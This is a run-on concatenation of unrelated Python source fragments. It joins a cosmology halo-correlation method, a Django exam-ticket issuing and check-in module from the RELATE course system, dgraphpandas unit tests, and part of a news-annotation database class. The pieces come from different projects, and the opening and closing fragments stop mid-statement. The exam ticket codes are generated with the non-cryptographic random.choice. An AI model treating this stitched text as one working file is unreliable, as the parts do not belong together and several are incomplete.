:math:`w_{hh}(R;n_1,n_2)` for 2 mass threshold halo samples specified by the corresponding cumulative number densities. Unlike get_wauto, this function considers a finite width for the radial integration, from :math:`-\pi_\mathrm{max}` to :math:`\pi_\mathrm{max}`. Args: R2d (numpy array): 2 dimensional projected separation in :math:`[h^{-1}\mathrm{Mpc}]` logdens1 (float): Logarithm of the cumulative halo number density of the first halo sample taken from the most massive, :math:`\log_{10}[n_1/(h^{-1}\mathrm{Mpc})^3]` logdens2 (float): Logarithm of the cumulative halo number density of the second halo sample taken from the most massive, :math:`\log_{10}[n_2/(h^{-1}\mathrm{Mpc})^3]` redshift (float): redshift at which the power spectrum is evaluated pimax (float): :math:`\pi_\mathrm{max}` for the upper limit of the integral Returns: numpy array: projected halo correlation function in :math:`[h^{-1}\mathrm{Mpc}]` """ xi3d = self._get_xiauto_spl(logdens1, logdens2, redshift) wauto = [] if integration == "quad": for R2dnow in R2d: wauto.append( 2*integrate.quad(lambda t: xi3d(np.sqrt(t**2+R2dnow**2)), 0, pimax, epsabs=1e-4)[0]) elif integration == "trapz": t = np.linspace(0, pimax, 1024) dt = t[1]-t[0] for R2dnow in R2d: wauto.append( 2*integrate.trapz(xi3d(np.sqrt(t**2+R2dnow**2)), dx=dt)) else: raise RuntimeError( "You should specify valid integration algorithm: quad or trapz") return np.array(wauto) def get_wauto_massthreshold(self, R2d, Mthre, redshift): """get_wauto_massthreshold Compute the projected halo-halo correlation function :math:`w_{hh}(R;>M_\mathrm{th})` for a mass threshold halo sample. Args: R2d (numpy array): 2 dimensional projected separation in :math:`[h^{-1}\mathrm{Mpc}]` Mthre (float): Minimum halo mass threshold in :math:`[h^{-1}M_\odot]` redshift (float): redshift at which the power spectrum is evaluated Returns: numpy array: projected halo correlation function in :math:`[h^{-1}\mathrm{Mpc}]` """ logdens = np.log10(self.mass_to_dens(Mthre, redshift)) return self.get_wauto(R2d, logdens, logdens, redshift) def get_wauto_masthreshold_cut(self, R2d, Mthre, redshift, pimax, integration="quad"): """get_wauto_massthreshold_cut Compute the projected halo-halo correlation function :math:`w_{hh}(R;>M_\mathrm{th})` for a mass threshold halo sample. Unlike get_wauto_massthreshold, this function considers a finite width for the radial integration, from :math:`-\pi_\mathrm{max}` to :math:`\pi_\mathrm{max}`. Args: R2d (numpy array): 2 dimensional projected separation in :math:`[h^{-1}\mathrm{Mpc}]` Mthre (float): Minimum halo mass threshold in :math:`[h^{-1}M_\odot]` redshift (float): redshift at which the power spectrum is evaluated pimax (float): :math:`\pi_\mathrm{max}` for the upper limit of the integral Returns: numpy array: projected halo correlation function in
<gh_stars>0 # -*- coding: utf-8 -*- from __future__ import division __copyright__ = "Copyright (C) 2015 <NAME>" __license__ = """ Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. """ from django.contrib.auth import get_user_model import django.forms as forms from django.utils.translation import ( ugettext, ugettext_lazy as _, pgettext) from django.shortcuts import ( # noqa render, get_object_or_404, redirect) from django.core.exceptions import ( # noqa PermissionDenied, ObjectDoesNotExist, SuspiciousOperation) from django.contrib import messages # noqa from django.contrib.auth.decorators import permission_required from django import http # noqa from django.db import transaction from django.db.models import Q from django.urls import reverse from django.views.decorators.debug import sensitive_post_parameters from django.views.decorators.cache import never_cache from django.views.decorators.csrf import csrf_protect from crispy_forms.layout import Submit from bootstrap3_datetime.widgets import DateTimePicker from course.models import (Exam, ExamTicket, Participation, FlowSession) from course.utils import course_view, render_course_page from course.constants import ( exam_ticket_states, participation_status, participation_permission as pperm) from relate.utils import StyledForm, string_concat # {{{ mypy if False: import datetime # noqa from typing import Optional, Text, Tuple, FrozenSet # noqa # }}} ticket_alphabet = "ABCDEFGHJKLPQRSTUVWXYZabcdefghjkpqrstuvwxyz23456789" def gen_ticket_code(): from random import choice return "".join(choice(ticket_alphabet) for i in range(8)) # {{{ issue ticket class IssueTicketForm(StyledForm): def __init__(self, now_datetime, *args, **kwargs): initial_exam = kwargs.pop("initial_exam", None) super(IssueTicketForm, self).__init__(*args, **kwargs) from course.auth import UserSearchWidget self.fields["user"] = forms.ModelChoiceField( queryset=(get_user_model().objects .filter(is_active=True) .order_by("last_name")), widget=UserSearchWidget(), required=True, help_text=_("Select participant for whom ticket is to " "be issued."), label=_("Participant")) self.fields["exam"] = forms.ModelChoiceField( queryset=( Exam.objects .filter( Q(active=True) & ( Q(no_exams_after__isnull=True) | Q(no_exams_after__gt=now_datetime) )) .order_by("no_exams_before") ), required=True, initial=initial_exam, label=_("Exam")) self.fields["valid_start_time"] = forms.DateTimeField( label=_("Start validity"), widget=DateTimePicker( options={"format": "YYYY-MM-DD HH:mm", "sideBySide": True}), required=False) self.fields["valid_end_time"] = forms.DateTimeField( label=_("End validity"), widget=DateTimePicker( options={"format": "YYYY-MM-DD HH:mm", "sideBySide": True}), required=False) self.fields["restrict_to_facility"] = forms.CharField( label=_("Restrict to facility"), help_text=_("If not blank, the exam ticket may only be used in the " "given facility"), required=False) self.fields["revoke_prior"] = forms.BooleanField( label=_("Revoke prior exam tickets for this user"), required=False, initial=True) self.helper.add_input( Submit( "issue", _("Issue ticket"))) @permission_required("course.can_issue_exam_tickets", raise_exception=True) def issue_exam_ticket(request): # must import locally for mock to work from course.views import get_now_or_fake_time now_datetime = get_now_or_fake_time(request) if request.method == "POST": form = IssueTicketForm(now_datetime, request.POST) if form.is_valid(): exam = form.cleaned_data["exam"] try: participation = Participation.objects.get( course=exam.course, user=form.cleaned_data["user"], status=participation_status.active, ) except ObjectDoesNotExist: messages.add_message(request, messages.ERROR, _("User is not enrolled in course.")) participation = None if participation is not None: if form.cleaned_data["revoke_prior"]: ExamTicket.objects.filter( exam=exam, participation=participation, state__in=( exam_ticket_states.valid, exam_ticket_states.used, ) ).update(state=exam_ticket_states.revoked) ticket = ExamTicket() ticket.exam = exam ticket.participation = participation ticket.creator = request.user ticket.state = exam_ticket_states.valid ticket.code = gen_ticket_code() ticket.valid_start_time = form.cleaned_data["valid_start_time"] ticket.valid_end_time = form.cleaned_data["valid_end_time"] ticket.restrict_to_facility = \ form.cleaned_data["restrict_to_facility"] ticket.save() messages.add_message(request, messages.SUCCESS, _( "Ticket issued for <b>%(participation)s</b>. " "The ticket code is <b>%(ticket_code)s</b>." ) % {"participation": participation, "ticket_code": ticket.code}) form = IssueTicketForm(now_datetime, initial_exam=exam) else: form = IssueTicketForm(now_datetime) return render(request, "generic-form.html", { "form_description": _("Issue Exam Ticket"), "form": form, }) # }}} # {{{ batch-issue tickets INITIAL_EXAM_TICKET_TEMPLATE = string_concat("""\ # """, _("List"), """ <table class="table"> <thead> <tr> <th>""", _("User"), "</th><th>", pgettext("real name of a user", "Name"), "</th><th>", pgettext("ticket code required to login exam", "Code"), """</th> </tr> </thead> {% for ticket in tickets %} <tr> <td> {{ ticket.participation.user.username }} </td> <td> {{ ticket.participation.user.get_full_name }} </td> <td> {{ ticket.code }} </td> </tr> {% endfor %} </table> ---------------- {% for ticket in tickets %} <h2 style="page-break-before: always">""", _("Instructions for " # noqa "{{ ticket.exam.description }}"), """ </h2> """, _("These are personalized instructions for " "{{ ticket.participation.user.get_full_name }}."), """ """, _("If this is not you, please let the proctor know " "so that you can get the correct set of instructions."), """ """, _("Please sit down at your workstation and open a " "browser at this location:"), """ """, _("Exam URL"), """: **`{{ checkin_uri }}`** """, _("You should see boxes prompting for your user " "name and a one-time check-in code."), """ """, _("Enter the following information"), ":", """ """, _("User name"), """: **`{{ ticket.participation.user.username }}`** """, pgettext("ticket code required to login exam", "Code"), """: **`{{ ticket.code }}`** """, _("You have one hour to complete the exam."), """ **""", _("Good luck!"), """** {% endfor %} <div style="clear:left; margin-bottom:3ex"></div>""") class BatchIssueTicketsForm(StyledForm): # prevents form submission with codemirror's empty textarea use_required_attribute = False def __init__(self, course, editor_mode, *args, **kwargs): super(BatchIssueTicketsForm, self).__init__(*args, **kwargs) from course.utils import get_codemirror_widget cm_widget, cm_help_text = get_codemirror_widget( language_mode={"name": "markdown", "xml": True}, dependencies=("xml",), interaction_mode=editor_mode) help_text = (ugettext("Enter <a href=\"http://documen.tician.de/" "relate/content.html#relate-markup\">" "RELATE markup</a> containing Django template statements to render " "your exam tickets. <tt>tickets</tt> contains a list of " "data structures " "containing ticket information. For each entry <tt>tkt</tt> " "in this list, " "use <tt>{{ tkt.participation.user.user_name }}</tt>, " "<tt>{{ tkt.code }}</tt>, <tt>{{ tkt.exam.description }}</tt>, " "and <tt>{{ checkin_uri }}</tt> as placeholders. " "See the example for how to use this.")) self.fields["exam"] = forms.ModelChoiceField( queryset=( Exam.objects.filter( course=course, active=True )), required=True, label=_("Exam")) self.fields["valid_start_time"] = forms.DateTimeField( label=_("Start validity"), widget=DateTimePicker( options={"format": "YYYY-MM-DD HH:mm", "sideBySide": True}), required=False) self.fields["valid_end_time"] = forms.DateTimeField( label=_("End validity"), widget=DateTimePicker( options={"format": "YYYY-MM-DD HH:mm", "sideBySide": True}), required=False) self.fields["restrict_to_facility"] = forms.CharField( label=_("Restrict to facility"), help_text=_("If not blank, the exam ticket may only be used in the " "given facility"), required=False) self.fields["revoke_prior"] = forms.BooleanField( label=_("Revoke prior exam tickets"), required=False, initial=False) self.fields["format"] = forms.CharField( label=_("Ticket Format"), help_text=help_text, widget=cm_widget, initial=INITIAL_EXAM_TICKET_TEMPLATE, required=True) self.style_codemirror_widget() self.helper.add_input( Submit( "issue", _("Issue tickets"))) @course_view def batch_issue_exam_tickets(pctx): if not pctx.has_permission(pperm.batch_issue_exam_ticket): raise PermissionDenied(_("may not batch-issue tickets")) form_text = "" request = pctx.request if request.method == "POST": form = BatchIssueTicketsForm(pctx.course, request.user.editor_mode, request.POST) if form.is_valid(): exam = form.cleaned_data["exam"] from jinja2 import TemplateSyntaxError from course.content import markup_to_html try: with transaction.atomic(): if form.cleaned_data["revoke_prior"]: ExamTicket.objects.filter( exam=exam, state__in=( exam_ticket_states.valid, exam_ticket_states.used, ) ).update(state=exam_ticket_states.revoked) tickets = [] for participation in ( Participation.objects.filter( course=pctx.course, status=participation_status.active) .order_by("user__last_name") ): ticket = ExamTicket() ticket.exam = exam ticket.participation = participation ticket.creator = request.user ticket.state = exam_ticket_states.valid ticket.code = gen_ticket_code() ticket.valid_start_time = \ form.cleaned_data["valid_start_time"] ticket.valid_end_time = form.cleaned_data["valid_end_time"] ticket.restrict_to_facility = \ form.cleaned_data["restrict_to_facility"] ticket.save() tickets.append(ticket) checkin_uri = pctx.request.build_absolute_uri( reverse("relate-check_in_for_exam")) form_text = markup_to_html( pctx.course, pctx.repo, pctx.course_commit_sha, form.cleaned_data["format"], jinja_env={ "tickets": tickets, "checkin_uri": checkin_uri, }) except TemplateSyntaxError as e: messages.add_message(request, messages.ERROR, string_concat( _("Template rendering failed"), ": line %(lineno)d: %(err_str)s") % { "lineno": e.lineno, "err_str": e.message.decode("utf-8")}) except Exception as e: messages.add_message(request, messages.ERROR, string_concat( _("Template rendering failed"), ": %(err_type)s: %(err_str)s") % {"err_type": type(e).__name__, "err_str": str(e)}) else: messages.add_message(request, messages.SUCCESS, _("%d tickets issued.") % len(tickets)) else: form = BatchIssueTicketsForm(pctx.course, request.user.editor_mode) return render_course_page(pctx, "course/batch-exam-tickets-form.html", { "form": form, "form_text": form_text, "form_description": ugettext("Batch-Issue Exam Tickets") }) # }}} # {{{ check in def check_exam_ticket( username, # type: Optional[Text] code, # type: Optional[Text] now_datetime, # type: datetime.datetime facilities # type: Optional[FrozenSet[Text]] ): # type: (...) -> Tuple[bool, Text] """ :returns: (is_valid, msg) """ try: user = get_user_model().objects.get( username=username, is_active=True) ticket = ExamTicket.objects.get( participation__user=user, code=code, ) except ObjectDoesNotExist: return (False, _("User name or ticket code not recognized.")) if ticket.state not in [ exam_ticket_states.valid, exam_ticket_states.used ]: return (False, _("Ticket is not in usable state. (Has it been revoked?)")) from django.conf import settings from datetime import timedelta validity_period = timedelta( minutes=settings.RELATE_TICKET_MINUTES_VALID_AFTER_USE) if (ticket.state == exam_ticket_states.used and now_datetime >= ticket.usage_time + validity_period): return (False, _("Ticket has exceeded its validity period.")) if not ticket.exam.active: return (False, _("Exam is not active.")) if now_datetime < ticket.exam.no_exams_before: return (False, _("Exam has not started yet.")) if ( ticket.exam.no_exams_after is not None and ticket.exam.no_exams_after <= now_datetime): return (False, _("Exam has ended.")) if (ticket.restrict_to_facility and ( facilities is None or ticket.restrict_to_facility not in facilities)): return (False, _("Exam ticket requires presence in facility '%s'.") % ticket.restrict_to_facility) if ( ticket.valid_start_time is not None and now_datetime < ticket.valid_start_time): return (False, _("Exam ticket is not yet valid.")) if ( ticket.valid_end_time is not None and ticket.valid_end_time < now_datetime): return (False, _("Exam ticket has expired.")) return True, _("Ticket is valid.") class ExamTicketBackend(object): def authenticate(self, request, username=None, code=None, now_datetime=None, facilities=None): is_valid, msg = check_exam_ticket(username,
<filename>tests/strategies/test_vertical.py import unittest from unittest.mock import patch, Mock from datetime import datetime import pandas as pd from pandas.testing import assert_frame_equal from parameterized import parameterized from dgraphpandas.strategies.vertical import vertical_transform class Vertical(unittest.TestCase): @parameterized.expand([ (None, {'config', 'fake'}, 'config'), (pd.DataFrame(), None, 'config'), (pd.DataFrame(), {'config', 'fake'}, None), (pd.DataFrame(), {'config', 'fake'}, None), (pd.DataFrame(), {}, 'config'), (pd.DataFrame(), None, '') ]) def test_vertical_transform_null_parameter(self, frame, config, config_file_key): ''' Ensures when parameters are null, an error is raised. ''' with self.assertRaises(ValueError): vertical_transform(frame, config, config_file_key) def test_vertical_transform_config_file_key_not_in_config(self): ''' Ensures when the passed config key is not within the config then an error is raised. ''' frame = pd.DataFrame() config_file_key = 'not_my_file' config = { 'files': {'my_file': {}} } with self.assertRaises(KeyError): vertical_transform(frame, config, config_file_key) def test_vertical_transform_subject_fields_not_defined(self): ''' Ensures when subject_fields has not been defined, then an error is raised. ''' frame = pd.DataFrame() config_file_key = 'customer' config = { 'files': { config_file_key: { 'type_overrides': {} } } } with self.assertRaises(ValueError): vertical_transform(frame, config, config_file_key) def test_vertical_predicate_column_not_defined(self): ''' Ensures when the predicate column is not defined then we throw an error. ''' frame = pd.DataFrame(data={ 'customer_id': [1, 2, 3], 'not_a_predicate': ['age', 'weight', 'orders'], 'object': [23, 90, 10] }) config_file_key = 'customer' config = { 'files': { 'customer': { 'subject_fields': ['customer_id'], } } } with self.assertRaises(KeyError): vertical_transform(frame, config, config_file_key) def test_vertical_object_column_not_defined(self): ''' Ensures when the object column is not defined then we throw an error. ''' frame = pd.DataFrame(data={ 'customer_id': [1, 2, 3], 'predicate': ['age', 'weight', 'orders'], 'not_a_object': [23, 90, 10] }) config_file_key = 'customer' config = { 'files': { 'customer': { 'subject_fields': ['customer_id'], } } } with self.assertRaises(KeyError): vertical_transform(frame, config, config_file_key) def test_vertical_transform_intrinsic_with_default_values(self): ''' Ensures when a DataFrame is passed with the default options then an intrinsic dataframe is created and an empty edges frame is created. ''' frame = pd.DataFrame(data={ 'customer_id': [1, 2, 3], 'predicate': ['age', 'weight', 'orders'], 'object': [23, 90, 10] }) config_file_key = 'customer' config = { 'files': { 'customer': { 'subject_fields': ['customer_id'], 'dgraph_type': "customer" } } } expected_frame = pd.DataFrame(data={ 'subject': ['customer_1', 'customer_2', 'customer_3', 'customer_1', 'customer_2', 'customer_3'], 'predicate': ['age', 'weight', 'orders', 'dgraph.type', 'dgraph.type', 'dgraph.type'], 'object': [23, 90, 10, 'customer', 'customer', 'customer'], 'type': ['<xs:string>']*6 }) intrinsic, edges = vertical_transform(frame, config, config_file_key) intrinsic = intrinsic.reset_index(drop=True) expected_frame = expected_frame.reset_index(drop=True) assert_frame_equal(expected_frame, intrinsic) self.assertTrue(edges.empty) def test_vertical_transform_with_type_overrides(self): ''' Ensures when type overrides have been provided, they are applied ''' frame = pd.DataFrame(data={ 'customer_id': [1, 2, 3], 'predicate': ['age', 'weight', 'orders'], 'object': [23, 90, 10] }) config_file_key = 'customer' config = { 'files': { 'customer': { 'subject_fields': ['customer_id'], 'dgraph_type': "customer", 'type_overrides': { 'age': 'int32', 'weight': 'float32', 'orders': 'int32', } } } } expected_frame = pd.DataFrame(data={ 'subject': ['customer_1', 'customer_2', 'customer_3', 'customer_1', 'customer_2', 'customer_3'], 'predicate': ['age', 'weight', 'orders', 'dgraph.type', 'dgraph.type', 'dgraph.type'], 'object': [23, 90, 10, 'customer', 'customer', 'customer'], 'type': ['<xs:int>', '<xs:float>', '<xs:int>'] + ['<xs:string>']*3 }) intrinsic, edges = vertical_transform(frame, config, config_file_key) intrinsic = intrinsic.reset_index(drop=True) expected_frame = expected_frame.reset_index(drop=True) assert_frame_equal(expected_frame, intrinsic) self.assertTrue(edges.empty) @patch('dgraphpandas.strategies.vertical.pd.read_csv') def test_vertical_transform_csv_file(self, mock_pandas: Mock): ''' Ensures when a file path is passed, then the file is read from pandas with the given options ''' file = 'test.csv' read_csv_options = {'sep': ';'} frame = pd.DataFrame(data={ 'customer_id': [1, 2, 3], 'predicate': ['age', 'weight', 'orders'], 'object': [23, 90, 10] }) mock_pandas.return_value = frame config_file_key = 'customer' config = { 'files': { 'customer': { 'subject_fields': ['customer_id'], 'dgraph_type': "customer", 'type_overrides': { 'age': 'int32', 'weight': 'float32', 'orders': 'int32', }, 'read_csv_options': read_csv_options } } } expected_frame = pd.DataFrame(data={ 'subject': ['customer_1', 'customer_2', 'customer_3', 'customer_1', 'customer_2', 'customer_3'], 'predicate': ['age', 'weight', 'orders', 'dgraph.type', 'dgraph.type', 'dgraph.type'], 'object': [23, 90, 10, 'customer', 'customer', 'customer'], 'type': ['<xs:int>', '<xs:float>', '<xs:int>'] + ['<xs:string>']*3 }) intrinsic, edges = vertical_transform(file, config, config_file_key) args, kwargs = mock_pandas.call_args_list[0] self.assertEqual(file, args[0]) self.assertEqual(read_csv_options, kwargs) intrinsic = intrinsic.reset_index(drop=True) expected_frame = expected_frame.reset_index(drop=True) assert_frame_equal(expected_frame, intrinsic) self.assertTrue(edges.empty) @parameterized.expand([ ### ( 'with_default_values', 'customer', { 'files': { 'customer': { 'subject_fields': ['customer_id'], 'dgraph_type': "customer", 'type_overrides': { 'age': 'int32', 'weight': 'float32', 'orders': 'int32', } } } }, pd.DataFrame(data={ 'customer_id': [1, 2, 3], 'predicate': ['age', 'weight', 'orders'], 'object': [23, 90, 10] }), pd.DataFrame(data={ 'subject': ['customer_1', 'customer_2', 'customer_3', 'customer_1', 'customer_2', 'customer_3'], 'predicate': ['age', 'weight', 'orders', 'dgraph.type', 'dgraph.type', 'dgraph.type'], 'object': [23, 90, 10, 'customer', 'customer', 'customer'], 'type': ['<xs:int>', '<xs:float>', '<xs:int>'] + ['<xs:string>']*3 }), pd.DataFrame(columns=['subject', 'predicate', 'object', 'type']), {} ), ### ( 'no_dgraph_type_defaults_to_config_key', 'customer', { 'files': { 'customer': { 'subject_fields': ['customer_id'], 'type_overrides': { 'age': 'int32', 'weight': 'float32', 'orders': 'int32', } } } }, pd.DataFrame(data={ 'customer_id': [1, 2, 3], 'predicate': ['age', 'weight', 'orders'], 'object': [23, 90, 10] }), pd.DataFrame(data={ 'subject': ['customer_1', 'customer_2', 'customer_3', 'customer_1', 'customer_2', 'customer_3'], 'predicate': ['age', 'weight', 'orders', 'dgraph.type', 'dgraph.type', 'dgraph.type'], 'object': [23, 90, 10, 'customer', 'customer', 'customer'], 'type': ['<xs:int>', '<xs:float>', '<xs:int>'] + ['<xs:string>']*3 }), pd.DataFrame(columns=['subject', 'predicate', 'object', 'type']), {} ), ### ( 'custom_predicate', 'customer', { 'files': { 'customer': { 'subject_fields': ['customer_id'], 'type_overrides': { 'age': 'int32', 'weight': 'float32', 'orders': 'int32', }, 'predicate_field': 'my_field' } } }, pd.DataFrame(data={ 'customer_id': [1, 2, 3], 'my_field': ['age', 'weight', 'orders'], 'object': [23, 90, 10] }), pd.DataFrame(data={ 'subject': ['customer_1', 'customer_2', 'customer_3', 'customer_1', 'customer_2', 'customer_3'], 'predicate': ['age', 'weight', 'orders', 'dgraph.type', 'dgraph.type', 'dgraph.type'], 'object': [23, 90, 10, 'customer', 'customer', 'customer'], 'type': ['<xs:int>', '<xs:float>', '<xs:int>'] + ['<xs:string>']*3 }), pd.DataFrame(columns=['subject', 'predicate', 'object', 'type']), {} ), ### ( 'custom_object', 'customer', { 'files': { 'customer': { 'subject_fields': ['customer_id'], 'type_overrides': { 'age': 'int32', 'weight': 'float32', 'orders': 'int32', }, 'object_field': 'my_object_field' } } }, pd.DataFrame(data={ 'customer_id': [1, 2, 3], 'predicate': ['age', 'weight', 'orders'], 'my_object_field': [23, 90, 10] }), pd.DataFrame(data={ 'subject': ['customer_1', 'customer_2', 'customer_3', 'customer_1', 'customer_2', 'customer_3'], 'predicate': ['age', 'weight', 'orders', 'dgraph.type', 'dgraph.type', 'dgraph.type'], 'object': [23, 90, 10, 'customer', 'customer', 'customer'], 'type': ['<xs:int>', '<xs:float>', '<xs:int>'] + ['<xs:string>']*3 }), pd.DataFrame(columns=['subject', 'predicate', 'object', 'type']), {} ), ### ( 'custom_predicate_and_object', 'customer', { 'files': { 'customer': { 'subject_fields': ['customer_id'], 'type_overrides': { 'age': 'int32', 'weight': 'float32', 'orders': 'int32', }, 'object_field': 'my_object_field', 'predicate_field': 'my_field' } } }, pd.DataFrame(data={ 'customer_id': [1, 2, 3], 'my_field': ['age', 'weight', 'orders'], 'my_object_field': [23, 90, 10] }), pd.DataFrame(data={ 'subject': ['customer_1', 'customer_2', 'customer_3', 'customer_1', 'customer_2', 'customer_3'], 'predicate': ['age', 'weight', 'orders', 'dgraph.type', 'dgraph.type', 'dgraph.type'], 'object': [23, 90, 10, 'customer', 'customer', 'customer'], 'type': ['<xs:int>', '<xs:float>', '<xs:int>'] + ['<xs:string>']*3 }), pd.DataFrame(columns=['subject', 'predicate', 'object', 'type']), {} ), ### ( 'rename_fields', 'customer', { 'files': { 'customer': { 'subject_fields': ['customer_id'], 'pre_rename': { 'orders': 'no_of_orders', 'age': 'birth' } } } }, pd.DataFrame(data={ 'customer_id': [1, 2, 3], 'predicate': ['age', 'weight', 'orders'], 'object': [23, 90, 10] }), pd.DataFrame(data={ 'subject': ['customer_1', 'customer_2', 'customer_3', 'customer_1', 'customer_2', 'customer_3'], 'predicate': ['birth', 'weight', 'no_of_orders', 'dgraph.type', 'dgraph.type', 'dgraph.type'], 'object': [23, 90, 10, 'customer', 'customer', 'customer'], 'type': ['<xs:string>']*6 }), pd.DataFrame(columns=['subject', 'predicate', 'object', 'type']), {} ), ### ( 'rename_fields_kwargs', 'customer', { 'files': { 'customer': {'subject_fields': ['customer_id']} } }, pd.DataFrame(data={ 'customer_id': [1, 2, 3], 'predicate': ['age', 'weight', 'orders'], 'object': [23, 90, 10] }), pd.DataFrame(data={ 'subject': ['customer_1', 'customer_2', 'customer_3', 'customer_1', 'customer_2', 'customer_3'], 'predicate': ['birth', 'weight', 'no_of_orders', 'dgraph.type', 'dgraph.type', 'dgraph.type'], 'object': [23, 90, 10, 'customer', 'customer', 'customer'], 'type': ['<xs:string>']*6 }), pd.DataFrame(columns=['subject', 'predicate', 'object', 'type']), { 'pre_rename': { 'orders': 'no_of_orders', 'age': 'birth' } } ), ### ( 'ignore_fields', 'customer', { 'files': { 'customer': { 'subject_fields': ['customer_id'], 'ignore_fields': ['age'] } } }, pd.DataFrame(data={ 'customer_id': [1, 2, 3], 'predicate': ['age', 'weight', 'orders'], 'object': [23, 90, 10] }), pd.DataFrame(data={ 'subject': ['customer_2', 'customer_3', 'customer_2', 'customer_3'], 'predicate': ['weight', 'orders', 'dgraph.type', 'dgraph.type'], 'object': [90, 10, 'customer', 'customer'], 'type': ['<xs:string>']*4 }), pd.DataFrame(columns=['subject', 'predicate', 'object', 'type']), {} ), ### ( 'ignore_fields_kwargs', 'customer', { 'files': { 'customer': {'subject_fields': ['customer_id']} } }, pd.DataFrame(data={ 'customer_id': [1, 2, 3], 'predicate': ['age', 'weight', 'orders'], 'object': [23, 90, 10] }), pd.DataFrame(data={ 'subject': ['customer_2', 'customer_3', 'customer_2', 'customer_3'], 'predicate': ['weight', 'orders', 'dgraph.type', 'dgraph.type'], 'object': [90, 10, 'customer', 'customer'], 'type': ['<xs:string>']*4 }), pd.DataFrame(columns=['subject', 'predicate', 'object', 'type']), {'ignore_fields': ['age']} ), ### ( 'with_csv_edges', 'customer', { 'files': { 'customer': { 'subject_fields': ['customer_id'], 'csv_edges': ['orders'] }, }, 'add_dgraph_type_records': False }, pd.DataFrame(data={ 'customer_id': [1, 2, 3], 'predicate': ['age', 'weight', 'orders'], 'object': [23, 90, '1,2,3'] }), pd.DataFrame(data={ 'subject': ['customer_1', 'customer_2', 'customer_3', 'customer_3', 'customer_3'], 'predicate': ['age', 'weight', 'orders', 'orders', 'orders'], 'object': [23, 90, '1', '2', '3'], 'type': ['<xs:string>']*5 }), pd.DataFrame(columns=['subject', 'predicate', 'object', 'type']), {} ), ### ( 'with_csv_edges_kwargs', 'customer', { 'files': { 'customer': { 'subject_fields': ['customer_id'], }, }, 'add_dgraph_type_records': False }, pd.DataFrame(data={ 'customer_id': [1, 2, 3], 'predicate': ['age', 'weight', 'orders'],
count, size = 0, len(self.articles) for id_ in self.articles: count = self.progression(count=count, modulo=self.modulo_articles, size=size, text='article') try: self.articles[id_].compute_corpus_annotations() except ParseError: raise Exception("Data is not clean, remove data %s and start again." % id_) self.write_debug(field='articles', method='annotations') @Verbose("Computing the contexts...") def compute_contexts(self): """ Compute the contexts of the articles for each Tuple. """ count, size = 0, len(self.tuples) for tuple_ in self.tuples: count = self.progression(count=count, modulo=self.modulo_tuples, size=size, text='tuple') query_ids = set() for article_id_ in tuple_.article_ids: self.articles[article_id_].compute_contexts(tuple_=tuple_) query_ids.update({tuple_.id_ + '_' + article_id_ + '_' + context_id_ for context_id_ in self.articles[article_id_].contexts[str(tuple_)]}) tuple_.query_ids = query_ids self.write_debug(field='articles', method='contexts') @Verbose("Computing the Wikipedia information...") def compute_wikipedia(self, load): """ Compute the wikipedia information about the entities from self.tuples. Args: load: bool, if True, load an existing file. """ wikipedia = self.wikipedia if load else {'found': dict(), 'not_found': set()} self.print("Initial entries: %i found/%i not found." % (len(wikipedia['found']), len(wikipedia['not_found']))) try: count, size = 0, len(self.entities) for name, entity in self.entities.items(): count = self.progression(count=count, modulo=self.modulo_entities, size=size, text='entity') if not load: wiki = entity.get_wiki() if wiki.summary is not None: wikipedia['found'][name] = wiki else: wikipedia['not_found'].add(name) else: if name in wikipedia['found']: wiki = wikipedia['found'][name] elif name in wikipedia['not_found']: wiki = Wikipedia() else: wiki = entity.get_wiki() if wiki.summary is not None: wikipedia['found'][name] = wiki else: wikipedia['not_found'].add(name) entity.wiki = wiki except (KeyboardInterrupt, WikipediaException) as err: self.print("An error occurred, saving the loaded information and leaving... (%s)" % str(err)) self.print("Final entries: %i found/%i not found." % (len(wikipedia['found']), len(wikipedia['not_found']))) self.wikipedia = wikipedia self.write_debug(field='wikipedia', method='wikipedia') @Verbose("Computing the Queries...") @Attribute('queries') def compute_queries(self): """ Compute the Queries of the database. """ queries = dict() count, size = 0, len(self.tuples) for tuple_ in self.tuples: count = self.progression(count=count, modulo=self.modulo_tuples, size=size, text='tuple') for article_id_ in sorted(tuple_.article_ids): article_contexts = self.articles[article_id_].contexts[str(tuple_)] for context_id_, context in article_contexts.items(): query_id_ = '_'.join([article_id_, tuple_.id_, context_id_]) queries[query_id_] = Query(id_=query_id_, tuple_=tuple_, article=self.articles[article_id_], context=context) self.queries = queries self.write_debug(field='queries', method='queries') @Verbose("Computing the annotated queries...") @Attribute('queries') def compute_annotated_queries(self, exclude_pilot): """ Compute the queries corresponding to the annotations. Args: exclude_pilot: bool, whether or not to exclude the data from the pilot. """ queries = dict() for path in sorted(glob(self.results_path + 'annotations/*/task/*.pkl')): path = path.split(self.results_path)[1] version = path.split('/')[1] if not exclude_pilot or 'pilot' not in version: folder_name = '/'.join(path.split('/')[:-1]) file_name = path.split('/')[-1].split('.pkl')[0] queries.update(self.load_obj_pkl(file_name=file_name, folder_name=folder_name)) self.queries = queries @Verbose("Computing the annotations...") @Attribute('annotations') def compute_annotations(self, exclude_pilot): """ Compute the annotations of the Mechanical Turks. Args: exclude_pilot: bool, whether or not to exclude the data from the pilot. """ annotations = defaultdict(list) for path in sorted(glob(self.results_path + 'annotations/*/results/*.csv')): path = path.split(self.results_path)[1] version = path.split('/')[1] batch = path.split('/')[-1].replace('_complete.csv', '') if not exclude_pilot or 'pilot' not in version: df = read_csv(self.results_path + path) self.print("%s loaded from %s" % (batch, path)) for _, row in df.iterrows(): id_ = row.get('Input.id_') annotations[id_].append(Annotation(id_=id_, version=version, batch=batch, row=row, silent=self.silent)) self.annotations = annotations # endregion # region Cleaning methods @Verbose("Cleaning the database's articles...") @Attribute('articles') def 